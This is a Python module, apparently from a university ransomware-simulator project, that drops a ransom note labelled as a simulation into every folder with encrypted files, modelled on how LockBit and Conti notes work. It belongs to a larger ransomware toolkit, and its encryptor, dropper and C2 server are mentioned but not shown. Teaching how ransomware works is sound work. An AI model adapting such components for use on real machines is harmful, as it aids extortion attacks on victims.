"""
ransom_note.py — Ransom Note Generator
IT360 Project 14: Ransomware Simulator (Academic Use Only)

Drops a README_RESTORE.txt in every directory that had files encrypted.
Format mirrors real ransomware notes (LockBit, Conti) in structure only —
no real payment addresses or threats. Purely academic simulation.

"""

import os


NOTE_FILENAME: str = "README_RESTORE.txt"

NOTE_TEMPLATE: str = """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
         YOUR FILES HAVE BEEN ENCRYPTED
         [IT360 ACADEMIC SIMULATION ONLY]
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

This is a SIMULATED ransomware note generated for the
IT360 university course project. No real harm has been
done. No real payment is requested.

-------------------------------------------------------
VICTIM ID : {victim_id}
HOSTNAME  : {hostname}
FILES ENC : {files_encrypted}
-------------------------------------------------------

IN A REAL ATTACK, instructions to recover your files
would appear here, along with a payment address and a
deadline. This simulator demonstrates that structure
without any malicious intent or capability.

TO RESTORE YOUR FILES (simulation):
  1. The decryption key has been sent to the C2 server.
  2. Run: python src/encryptor/decryptor.py <aes_key>
  3. All files will be restored and integrity verified.

-------------------------------------------------------
MITRE ATT&CK Reference : T1486 - Data Encrypted for Impact
Course               : IT360 — Project 14
-------------------------------------------------------

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
         THIS IS AN ACADEMIC SIMULATION
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""


def generate_ransom_note(
    directory: str,
    victim_id: str,
    hostname: str,
    files_encrypted: int,
) -> str:
    """
    Write a README_RESTORE.txt ransom note into the given directory.

    The note contains the victim_id (used to retrieve the decryption
    key from C2), hostname, and file count. In real ransomware this
    note also contains payment instructions and a deadline.

    Args:
        directory      : Directory path where the note will be dropped.
        victim_id      : Unique victim identifier generated by dropper.
        hostname       : Victim machine hostname.
        files_encrypted: Number of files encrypted in this run.

    Returns:
        str: Full path to the written ransom note.
    """
    note_path: str = os.path.join(directory, NOTE_FILENAME)
    note_content: str = NOTE_TEMPLATE.format(
        victim_id=victim_id,
        hostname=hostname,
        files_encrypted=files_encrypted,
    )

    with open(note_path, "w", encoding="utf-8") as f:
        f.write(note_content)

    print(f"[+] Ransom note dropped: {note_path}")
    return note_path


def drop_notes_in_all_affected_dirs(
    encrypted_file_paths: list[str],
    victim_id: str,
    hostname: str,
    files_encrypted: int,
) -> None:
    """
    Drop a ransom note in every unique directory that had files encrypted.

    Mirrors real ransomware behavior — LockBit and Conti drop a note
    in every folder they touch so the victim immediately sees it when
    browsing their files.

    Args:
        encrypted_file_paths: List of .locked file paths produced by encryptor.
        victim_id           : Unique victim identifier.
        hostname            : Victim machine hostname.
        files_encrypted     : Total number of files encrypted.
    """
    # Collect unique parent directories
    affected_dirs: set[str] = {
        os.path.dirname(p) for p in encrypted_file_paths
    }

    for directory in affected_dirs:
        generate_ransom_note(directory, victim_id, hostname, files_encrypted)